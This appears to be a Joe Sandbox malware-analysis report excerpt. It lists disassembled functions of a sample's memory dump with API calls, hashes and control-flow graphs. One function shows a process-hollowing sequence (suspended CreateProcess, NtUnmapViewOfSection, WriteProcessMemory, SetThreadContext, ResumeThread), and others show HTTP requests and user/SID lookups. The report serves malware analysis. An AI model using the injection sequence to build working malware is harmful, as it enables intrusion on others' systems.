                                                                        • Opcode ID: feb5cebf922a56195c6e52ffdebcf452b87137afebcc93f7ff5f1a3ad440ced1
                                                                        • Instruction ID: de6e056ce77e9d15dd6cd08572cb1321142041043650dc7299382ec9eb279ce5
                                                                        • Opcode Fuzzy Hash: feb5cebf922a56195c6e52ffdebcf452b87137afebcc93f7ff5f1a3ad440ced1
                                                                        • Instruction Fuzzy Hash: 13F0F6322701B77ADB327E6AEC04FBF2BA89FA1570F11021AFE549A1C0DB20C50081A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 594 121c25d-121c264 595 121c266-121c268 594->595 596 121c269-121c270 call 12206b4 call 1220a55 594->596 600 121c275-121c279 596->600 601 121c280-121c289 call 121c2b0 600->601 602 121c27b-121c27e 600->602 607 121c290-121c297 601->607 608 121c28b-121c28e 601->608 603 121c2a4-121c2af call 121d653 602->603 610 121c29c-121c2a3 call 121d653 607->610 608->610 610->603
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: 9fc3c9f86e3ec65aea9a1b526994be93efd9134285bf46c12ed262d9b460d059
                                                                        • Instruction ID: e3fdba9b9fcbaca74cbc6bc068639ded21d4e0f2d59133d2d416e00e8e9b955d
                                                                        • Opcode Fuzzy Hash: 9fc3c9f86e3ec65aea9a1b526994be93efd9134285bf46c12ed262d9b460d059
                                                                        • Instruction Fuzzy Hash: 9EE0E5266655635BE632EABE78042FD17C05BB2738F114726E62CC60C8DFB4449186A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 613 1215e20-1215e3c 614 1215e64-1215e6a 613->614 615 1215e3e-1215e43 613->615 618 1215e70-1215e7b 614->618 619 1215f4e call 12169f0 614->619 616 1215e45 615->616 617 1215e47-1215e61 call 1219bb0 615->617 616->617 622 1215e84-1215e91 618->622 623 1215e7d-1215e82 618->623 625 1215f53-1215f58 call 1202150 619->625 627 1215e93-1215e98 622->627 628 1215e9a-1215e9f 622->628 626 1215ea2-1215eb6 623->626 629 1215eb8-1215ebd 626->629 630 1215edd-1215edf 626->630 627->626 628->626 629->625 632 1215ec3-1215ed0 call 1217403 629->632 633 1215ee1-1215ee2 call 1217403 630->633 634 1215eec 630->634 642 1215ed2-1215edb 632->642 643 1215f49 call 121bcdc 632->643 640 1215ee7-1215eea 633->640 638 1215eee-1215f11 call 121a270 634->638 646 1215f13-1215f1e 638->646 647 1215f3c-1215f46 638->647 640->638 642->638 643->619 648 1215f20-1215f2e 646->648 649 1215f32-1215f39 call 1217684 646->649 648->643 650 1215f30 648->650 649->647 650->649
                                                                        APIs
                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 01215F53
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Concurrency::cancel_current_task
                                                                        • String ID:
                                                                        • API String ID: 118556049-0
                                                                        • Opcode ID: 99a60c00e11d80a0fe42efdd695636690d312d340402f51b068320ab2a9b3208
                                                                        • Instruction ID: 91f6c522de07e4b90ce218674ba38d799bfa5b5f43368a65cf3f4a57825ad542
                                                                        • Opcode Fuzzy Hash: 99a60c00e11d80a0fe42efdd695636690d312d340402f51b068320ab2a9b3208
                                                                        • Instruction Fuzzy Hash: 96311671A202019BD728DE7CD88057EBBE9EBB6220B2443BEEA25C7385D77099448791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 0120218E
                                                                          • Part of subcall function 01218483: RaiseException.KERNEL32(E06D7363,00000001,00000003,0120216C,?,?,?,0120216C,?,01236D1C), ref: 012184E3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExceptionRaise___std_exception_copy
                                                                        • String ID:
                                                                        • API String ID: 3109751735-0
                                                                        • Opcode ID: 278bf3adacdb062bd876796adc151054d6cdda24f30374ec1f8e470d13b65855
                                                                        • Instruction ID: 0913f46a386fe3af4a2a6cfbfb0f891f24f1a67862d06731b7be85af4b1ddeb7
                                                                        • Opcode Fuzzy Hash: 278bf3adacdb062bd876796adc151054d6cdda24f30374ec1f8e470d13b65855
                                                                        • Instruction Fuzzy Hash: AB01267587020EB7CB14FBE8EC058A9BBFCDE35110B508635FB14A6545FBB0E65486D1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 675 121d4b1-121d4d7 call 121d287 678 121d530-121d533 675->678 679 121d4d9-121d4eb call 122268f 675->679 681 121d4f0-121d4f5 679->681 681->678 682 121d4f7-121d52f 681->682
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __wsopen_s
                                                                        • String ID:
                                                                        • API String ID: 3347428461-0
                                                                        • Opcode ID: c816fe522384515d78a8bce8c58903938f2fdd8c9b75a2791bf9c2640bf77320
                                                                        • Instruction ID: c856b37e325a0cf9aaaea186ea2bebd2cf9c2bbfd4c250a70b280123700bd13e
                                                                        • Opcode Fuzzy Hash: c816fe522384515d78a8bce8c58903938f2fdd8c9b75a2791bf9c2640bf77320
                                                                        • Instruction Fuzzy Hash: 9C111872A0420AAFCF05DF98E94499B7BF4EF48308F054069F805AB251E670EA11CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 683 121ed56-121ed63 call 121f925 685 121ed68-121ed73 683->685 686 121ed75-121ed77 685->686 687 121ed79-121ed81 685->687 688 121edc4-121edd0 call 121d653 686->688 687->688 689 121ed83-121ed87 687->689 691 121ed89-121edbe call 121e503 689->691 695 121edc0-121edc3 691->695 695->688
                                                                        APIs
                                                                          • Part of subcall function 0121F925: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0121E0E6,00000001,00000364,00000006,000000FF,?,?,01218272,?), ref: 0121F966
                                                                        • _free.LIBCMT ref: 0121EDC5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap_free
                                                                        • String ID:
                                                                        • API String ID: 614378929-0
                                                                        • Opcode ID: bbfaf170cd2aa4a5dd4654b786cba334a1d7a93fa1ef5963fa5f0812df2330b2
                                                                        • Instruction ID: e6cce40d5e06437805f8ce5a11ab076b964048550aaf45ad3f17050e05a01ade
                                                                        • Opcode Fuzzy Hash: bbfaf170cd2aa4a5dd4654b786cba334a1d7a93fa1ef5963fa5f0812df2330b2
                                                                        • Instruction Fuzzy Hash: 5E014972614317ABC322DF9DD88599AFBDCEB153B0F46062EE955A76C0E7706800C7A4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: 6d7cabbe3305cb9b6d011bf0e9d56addc9b4860a8407226052aa3c61f76cc774
                                                                        • Instruction ID: 5ccbcd6c559340f788794dcca1b1903e29dd84b6743c177613d71b7c34c678a4
                                                                        • Opcode Fuzzy Hash: 6d7cabbe3305cb9b6d011bf0e9d56addc9b4860a8407226052aa3c61f76cc774
                                                                        • Instruction Fuzzy Hash: 63014F72C1115AFFCF11AFA89C01AFE7FF5AF18210F144565EA14E2190E6328A60DB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0121E0E6,00000001,00000364,00000006,000000FF,?,?,01218272,?), ref: 0121F966
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 17c93dc7b6bcaf7160f85efe15a63fdd76acee559ad60ba961dd4153f3f644c5
                                                                        • Instruction ID: 0b8e6e231d3f932f40be920d5f272383c20d8dc10daef3d849d74fbf71a02874
                                                                        • Opcode Fuzzy Hash: 17c93dc7b6bcaf7160f85efe15a63fdd76acee559ad60ba961dd4153f3f644c5
                                                                        • Instruction Fuzzy Hash: D4F0E03157522676EB26FA3A9E0576B3BDAAF71770B054512DE34D718CCA30D8058AE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,01218272,?,?,?,?,?,012020C3,?,?), ref: 0121DB6E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 2853472e2361ec52a51aa03c1e8eb1090aefc8a8d2ba3aa12aecd89856569c11
                                                                        • Instruction ID: 009f3dd964a8aeb248f6ef9926a8252406d147723f8c39315e5cc47fe3b1435d
                                                                        • Opcode Fuzzy Hash: 2853472e2361ec52a51aa03c1e8eb1090aefc8a8d2ba3aa12aecd89856569c11
                                                                        • Instruction Fuzzy Hash: 2BE0EC3517011BE7EA3195E99C0CB6B3AD8BB712B0F050120DE17971CCEB50D90082E5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,00000000,?,01222758,?,?,00000000,?,01222758,00000000,0000000C), ref: 01222385
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: a3c97456a7442d61044b44ee0e5984786f464c97a18fe15ba67fba5d4a1cee71
                                                                        • Instruction ID: 9a868948283d05d4ba1effe70b67d3353e6939ceb785daa04b517665dbd3d133
                                                                        • Opcode Fuzzy Hash: a3c97456a7442d61044b44ee0e5984786f464c97a18fe15ba67fba5d4a1cee71
                                                                        • Instruction Fuzzy Hash: 58D06C3200010DBBDF228E84ED46EDA3FAAFB48714F114010FA1856020C732E821AB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 012038E6
                                                                        • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0120394B
                                                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 01203964
                                                                        • GetThreadContext.KERNEL32(?,00000000), ref: 0120397F
                                                                        • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 012039A3
                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 012039BE
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 012039C5
                                                                        • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 012039ED
                                                                        • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 01203A0E
                                                                        • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 01203A5A
                                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 01203A96
                                                                        • SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 01203AB2
                                                                        • ResumeThread.KERNEL32(?,?,?,00000000), ref: 01203ABE
                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 01203ACC
                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 01203AED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                                        • String ID: $NtUnmapViewOfSection$ntdll.dll
                                                                        • API String ID: 4033543172-1522589568
                                                                        • Opcode ID: 162e977cc0f8ed410cc21e00a7790ecdd03804bca888ea367f439c9e49ce2208
                                                                        • Instruction ID: 5e03b8fe35b041eb9ad09129f07cb64fd09ce92141bc849e94e0e72dc25bb6ff
                                                                        • Opcode Fuzzy Hash: 162e977cc0f8ed410cc21e00a7790ecdd03804bca888ea367f439c9e49ce2208
                                                                        • Instruction Fuzzy Hash: FD515B70A40218AFEB319F54EC49FEAB7B4FF08701F100095F649AA281D776AA91DF54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • InternetOpenW.WININET(01233F6C,00000000,00000000,00000000,00000000), ref: 0120871C
                                                                        • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 01208740
                                                                        • HttpOpenRequestA.WININET(?,00000000), ref: 0120878A
                                                                        • HttpSendRequestA.WININET(?,00000000), ref: 0120884A
                                                                        • InternetReadFile.WININET(?,?,000003FF,?), ref: 012088FC
                                                                        • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 012089B0
                                                                        • InternetCloseHandle.WININET(?), ref: 012089D7
                                                                        • InternetCloseHandle.WININET(?), ref: 012089DF
                                                                        • InternetCloseHandle.WININET(?), ref: 012089E7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
                                                                        • String ID:
                                                                        • API String ID: 1354133546-0
                                                                        • Opcode ID: 125de1ceeee4ea77ec5bd4c96c44f8c7b07f62b962ea3d55de3696ddaed51579
                                                                        • Instruction ID: 23f09063a16689dee1b7e1d77c81031492cf36f01beba94f7a563715cc2b383d
                                                                        • Opcode Fuzzy Hash: 125de1ceeee4ea77ec5bd4c96c44f8c7b07f62b962ea3d55de3696ddaed51579
                                                                        • Instruction Fuzzy Hash: 23C108B0A201189BDB29DF28CC88BEE7F75EF51314F544298E608972D6DB719AC0CF95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$InformationTimeZone
                                                                        • String ID:
                                                                        • API String ID: 597776487-0
                                                                        • Opcode ID: 2e7c8f9af18087797003aa9ec1915aedbd9df9f34fd5d530a76ec749424f1ee9
                                                                        • Instruction ID: d8401c85d2b3a9aa9d957120ee5f6780ba3847f4208fef07cbd7a103a61ead38
                                                                        • Opcode Fuzzy Hash: 2e7c8f9af18087797003aa9ec1915aedbd9df9f34fd5d530a76ec749424f1ee9
                                                                        • Instruction Fuzzy Hash: 5FC15871A20266BFDB25DF6DD844ABEBBF9FF59350F1400A9D680DB241E7788A01CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 01217B12
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FeaturePresentProcessor
                                                                        • String ID:
                                                                        • API String ID: 2325560087-0
                                                                        • Opcode ID: 25f4e96ee77054385f1220d7d2becf7e9c8b6bffbda62aecb891e765584f47f0
                                                                        • Instruction ID: 676cdb164cab37b333ba97a27a63464344f8fb54255762234395248366a0c38c
                                                                        • Opcode Fuzzy Hash: 25f4e96ee77054385f1220d7d2becf7e9c8b6bffbda62aecb891e765584f47f0
                                                                        • Instruction Fuzzy Hash: BD51A47191021ACFEF35CF69E5853AABBF0FB54314F248A69D602EB348D3B59941CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 38dd18e236bff778ebfac104873e99183c47078571e48966eb6fb82665c9afe8
                                                                        • Instruction ID: 56f3fd00e43d7eb07b5cbb1c92310f6be0fd7c7a496167948dd7d49eb5dd5655
                                                                        • Opcode Fuzzy Hash: 38dd18e236bff778ebfac104873e99183c47078571e48966eb6fb82665c9afe8
                                                                        • Instruction Fuzzy Hash: 6FE08C72961228EBCB15DF8CC9049AAF7ECEB48A40B150096B601D3100C270DE00C7D0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetUserNameW.ADVAPI32(00000000,?), ref: 01203132
                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 01203147
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0120314A
                                                                        • GetUserNameW.ADVAPI32(00000000,?), ref: 01203158
                                                                        • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 0120317B
                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 01203186
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 01203189
                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 01203199
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0120319C
                                                                        • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 012031C6
                                                                        • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 012031D9
                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 012032D5
                                                                        • HeapFree.KERNEL32(00000000), ref: 012032DE
                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012032E3
                                                                        • HeapFree.KERNEL32(00000000), ref: 012032E6
                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012032ED
                                                                        • HeapFree.KERNEL32(00000000), ref: 012032F0
                                                                        • LocalFree.KERNEL32(00000000), ref: 012032F5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                                                                        • String ID:
                                                                        • API String ID: 3326663573-0
                                                                        • Opcode ID: a210dd5ff76c83f69fb08138c37c616d66a91136c91d433eaf652a7e758fcfd8
                                                                        • Instruction ID: b4897b50b151e1e523aefccfbd9e8b29dfb30bf42601be19eeb58d299d432365
                                                                        • Opcode Fuzzy Hash: a210dd5ff76c83f69fb08138c37c616d66a91136c91d433eaf652a7e758fcfd8
                                                                        • Instruction Fuzzy Hash: B97152B1D10249AFDB25DFA9DC88BEFBBB8FF48310F004529E905A7285DB749905CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ___free_lconv_mon.LIBCMT ref: 01221705
                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 012212BB
                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 012212CD
                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 012212DF
                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 012212F1
                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 01221303
                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 01221315
                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 01221327
                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 01221339
                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 0122134B
                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 0122135D
                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 0122136F
